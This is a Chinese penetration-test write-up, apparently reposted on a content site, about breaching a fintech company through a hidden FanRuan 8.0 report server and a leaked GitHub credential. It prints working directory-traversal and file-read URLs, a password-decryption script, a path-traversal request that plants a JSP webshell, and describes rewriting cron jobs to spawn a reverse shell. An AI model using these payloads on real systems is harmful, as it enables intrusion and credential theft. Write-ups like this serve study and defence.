记录一次渗透测试艰难打点的过程

本次接到一个hvv前的渗透测验项目,一家互联网金融,本年是第二年给他们家做测验,项目完成后,复盘时觉得仍是有一些东西是能够记载一下的。

项目整体情况

该厂家财物较多,前期收集到的财物大约有100多个,大部分为Springboot开发,有阿里云waf,部分为nodejs+vue的。而且上一年从前挖过一次,找到的洞悉数从前修正了,所以本年在打的话就比拟费力了。本年的开掘要点在于上一年没找到的财物,但是一顿猛如虎的操作往后,只挖到一些信息走漏和越权,这显然是无法交差的。
上一年的开掘要点是Springboot的站,本年就选择nodejs的站为要点来打破,固然困难,但最终仍是找到两个打破点成功进入内网。

一、 打破点1:客服体系

首要关注的财物是客服体系,该体系运转在444端口(域名先称之为https://www.test.com:444/),选用nodejs+vue开发,有上传功用,但上传后的文件直接传到的阿里云的oss上,xss上一年挖过了,也从前被修正了,扫描端口,发现开了80、443、444,不过悉数指向该客服体系,由于意图nodejs的站比拟少,无法只能死磕这个站了。

0x01 差点错过的切入点

死磕的过程中紧紧盯着收集到的信息,发现有一个细节便是阅读器选项卡里的logo变了,本来是厂家的logo,现在居然变成了其他logo,这个细节让我觉得这个站点下面还有其他站点。
本来的logo信息如下:(原谅我找了个网图,由于一看logo就或许会露出厂商信息)

6176ae801241.png

扫描完目录后的logo如下:

83357e2f86f8.png

百度后发现这是个帆软的报表体系的logo,猜疑是在某个二级目录下布置的,于是开端了绵长的目录扫描,发现除了是客服体系的目录外,并没有其他的收成,但是logo的改变,让我确信该站点存在其他体系,而且在信息收集的时分意外拜访过,才会招致logo的改变。

0x02 山穷水尽

现在整理下思绪,肯定有个帆软的报表体系,那么就针对性的对帆软的目录构造中止爆破,这儿我先是在本地搭建了一个帆软的体系,发现拜访的url联接为

http://localhost:8075/WebReport/ReportServer?op=fs

默许是运转在/WebReport/的目录下,咱们直接拜访这个目录却提示404,这也是前期扫描器没扫出来的缘由,404的问题后边也会说到。

f557db082fe7.png

无法在本地体系里把帆软的目录及拜访首页的联接悉数做成字典,挨个中止测验,最终发现拜访https://www.test.com:444//WebReport/ReportServer的时分出现了帆软的界面。。

ea301a5918ab.png

0x03 漏洞组合拿权限

既然从前找到了目录,而且判别出版别为8.0
这个版别是存在漏洞的,测验了一下揭露的漏洞

目录遍历

https://www.test.com:444/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../..&currentUserName=admin&currentUserId=1&isWebReport=true
8931e5bd7546.png

任意文件读取:

https://www.test.com:444/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
0851c223c45a.png

成功读到了加密后的账号暗码

# -*- coding: utf-8 -*-cipher = 'xxx' PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] Password = ""cipher = cipher[3:] for i in range(int(len(cipher) / 4)):    c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)    c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]    Password = Password + chr(c2)print (Password)

然后使用脚本解密出来账号暗码,一切顺利进入后台,然后便是插件处上传插件,上传后的插件默许在/WEB-INF/目录下,需求把文件移出来,这儿参阅了ADog大神的文章(http://foreversong.cn/archives/1378) 然后用如下数据包中止脚本移动

POST /WebReport/ReportServer?op=fr_server&cmd=manual_backup HTTP/1.1Host: www.test.com:444Content-Length: 106Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Language: zh-CN,zh;q=0.8Cookie: xxxConnection: closeoptype=edit_backup&oldname=../../plugins/plugin-com.fr.plugin.external&newname=../../../data.jsp&serverID=

然后开开心心去拜访shell,却发现是404,操作步骤是本地测验过的,没有问题,用前面的列目录去检查,发现shell的确移动到了/WebReport/目录下,直接拜访https://www.test.com:444/WebReport/data.jsp 仍是404,测验该目录下的一些静态文件,也悉数404,猜想是只映射了http://www.test.com:444/WebReport/ReportServer这一个链接出来。

0x04 一波三折完成指令履行

冷静下来,总结一下,咱们现在有了列目录漏洞、读文件漏洞、移动文件的权限,那么开端测验直接写计划使命反弹shell就好了,先通过列目录漏洞找到计划使命目录检查能否存在已有的计划使命,然后把弹shell的脚本交换到现有计划使命里,完成了指令履行。

等了好久却没收到shell,又是一次深重的打击,用计划使命的指令履行写个文件看看,发现的确能够写进去,那么只能说明意图不出网或许指令被阻拦了。。但仍然完成了指令履行,也算是个高危报告了,体系暂时告一段落。

6ea5c4ed9567.png

二、github源码走漏

固然拿到了指令履行,但意图仍是要进内网的,无法翻看体系内的文件,然后在体系内某个目录的文件里发现了一个并不在测验列表里的域名,在github查找意图域名,发现了一个库房,里面的源码最近一次修正时6年前,且信息收集的时分并没有发现这个体系,猜疑该体系从前下线,例行公事的去翻翻配置文件,发现了配置文件里有个走漏的邮箱,但毕竟6年了,也没抱太大希望去测验了一下,居然登录进去了。。

b21071ee6c57.png

163的企业邮箱

c0fe41263d4e.png

在这个邮箱里发现了用户重置vpn暗码的邮件,然后通过vpn顺利进入内网。。

三、总结

此次打点过程比拟困难,用了大约三天的时刻,发现帆软的体系关于这次项目来说是个绝对性的打破点,主要仍是要细心,假设没留意到阅读器选项卡的logo改变,或许就错过这个漏洞了。——本页内容已结束,喜欢请分享——

本站无法对海量内容真伪性鉴别,请勿相信本站任何号码,邮件,站外网址等信息,如有需要,请自行甄别。版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至net@163.com举报,一经查实,本站将立刻删除。
(0)
上一篇 2022年6月5日 下午6:19
下一篇 2022年6月5日 下午9:18

相关推荐

  • 玉米头是什么样子(玉米头是什么)

    您好,今天帅帅来为大家解答以上的问题。玉米头是什么样子,玉米头是什么相信很多小伙伴还不知道,现在让我们一起来看看吧! 1、去了头的玉米,是人为的阻断雄花所需的营养,将所有的全部供给…

    2023年10月27日
  • 鸟的种类(鸟是如何分类的 有什么区别)

    鸟,又称作鸟儿,是体表被覆羽毛的卵生脊椎动物,大多数飞翔生活。胸肌发达;直肠短,食量大消化快,即消化系统发达,有助于减轻体重,利于飞行;心脏有两心房和两心室,心搏次数快。体温恒定。呼吸器官除具肺外,还具有多个气囊辅助呼吸,使得鸟类无论在吸气和呼气时,均有氧气通过肺,即双重呼吸。分为以下三类:

    2022年6月13日 投稿
  • 怎么建立共享盘链接(怎么建立共享文件夹)

    您好,今天帅帅来为大家解答以上的问题。怎么建立共享盘链接,怎么建立共享文件夹相信很多小伙伴还不知道,现在让我们一起来看看吧! 1、创建一个文件夹。 2、点击文件夹属性,选择共享栏目…

    2023年1月24日
  • 活着的者是什么电影

    活着的者是什么电影 《活着的者》是由李安执导的1994年上映的一部华语电影,主演为张丰毅、章子怡、陈汉典和杨紫琼。 电影讲述了一个叫季星驰(张丰毅 饰)的老头,在被抗日军处决之前,…

    2023年6月16日
  • dc游戏光盘怎么复制

    dc游戏光盘怎么复制 dc游戏光盘复制是一种很受欢迎的方式,可以让玩家创造出自己的游戏光盘副本,以便在未来可以再次进行游戏。如果你想要复制dc游戏光盘,你可以使用游戏光盘复制软件来…

    2023年7月24日
  • 美白养颜茶有哪些功效(美白养颜茶有用吗)

    1.美白养生茶是一种饮料,由玫瑰花、玉兰花等制成。 2.成份:玫瑰、木兰花、洋甘菊、金盏花、玫瑰果等。 3.功效:使面部红润有光泽,促进新陈代谢,美白肌肤,延缓衰老。 4.用法用量…

    2022年12月2日
  • 如来什么时候过世

    如来什么时候过世 如来佛世界上最有名的佛陀,他于公元前563年出生,公元前483年,他在印度梵谷的大梵树下完成菩提。公元前483年2月15日,如来佛在今天的拉萨地区的菩提树下,宣讲…

    2023年6月10日
  • 拉马努金恒等式表达什么(拉马努金恒等式的介绍)

    您好,今天帅帅来为大家解答以上的问题。拉马努金恒等式表达什么,拉马努金恒等式的介绍相信很多小伙伴还不知道,现在让我们一起来看看吧! 1、3=√(1+8)=√(1+2√(1+3*5)…

    2023年1月15日
  • 萌道鲜师(关于萌道鲜师的介绍)

    大家好,小节来为大家解答以上的问题。萌道鲜师,关于萌道鲜师的介绍很多人还不知道,现在让我们一起来看看吧! 1、萌道鲜师是韩国的林达永原作、李秀显作画的漫画作品。 2、某日,晨浩在书…

    2023年1月15日
  • 济南西站在哪个区(带你了解济南西站)

    齐鲁网·闪电新闻5月17日讯 济南西站是京沪高铁五大始发站之一,车站枢纽车次多、人流大,疫情防控形势极为复杂。作为省会济南的“西大门”,这里既是桥架京沪、联通全国的重要窗口,更是疫情防控、阻断传播的重要关口。如何在做好疫情防控的同时保障群众安心安全出行对于槐荫区是个不小的挑战。槐荫区成立了济南西站疫情防控专班,坚持联防联控、全链闭环、尽锐出战,用实际行动筑牢“站”上疫情防控红色防线,切实守牢济南疫情防控“西大门”。

    2022年10月23日
  • 取消值机是什么意思(取消值机是什么意思)

    您好,今天帅帅来为大家解答以上的问题。取消值机是什么意思,取消值机是什么意思相信很多小伙伴还不知道,现在让我们一起来看看吧! 1、一、点开预订航班的APP或相关网页,以APP为例打…

    2023年1月22日
  • “三赎基督”(邪教“三赎基督”)

    家住贵州印江自治县杨柳乡凯坪村的张某某,淳朴善良,因妻子身体残疾,又养育有4个小孩,生活的重担压得他有点喘不过气来。1999年初,一个外乡人到该村传福音,向张某某宣传只要信奉“三赎基督”,每天按时祷告求福,神就会保佑全家得到平安和福音,生病不用打针吃药、庄稼不用上肥。于是张某某轻信他的谣言,开始信奉“三赎基督”邪教并参与活动。在他的带领下,妻子也开始信教。夫妻二人定期到别的人家参加“三赎基督”组织的聚会活动。一时间,张某某一家把主要精力都放在祷告求福上,放松了农业生产,家庭经济生活更加陷入困境。

    2022年5月19日
  • 伏魔记乌龙剑怎么得到

    伏魔记乌龙剑怎么得到 伏魔记乌龙剑是一把极其珍贵的武器,有着传说般的传奇故事。传说伏魔记乌龙剑可以帮助使用者获得不可思议的力量,能够改变未来。而要得到伏魔记乌龙剑,就必须要完成一项…

    2023年6月16日
  • 赢麻了的比亚迪和不断降价的特斯拉,到底谁才是真正的赢家

    如果要问目前新能源汽车市场中,哪个品牌才是最大的赢家,估计很多人都要说是比亚迪。确实,单论发展速度和市场表现,作为当前国内新能源品牌的一哥,比亚迪有足够的话语权。

    2023年1月2日 投稿

发表回复

登录后才能评论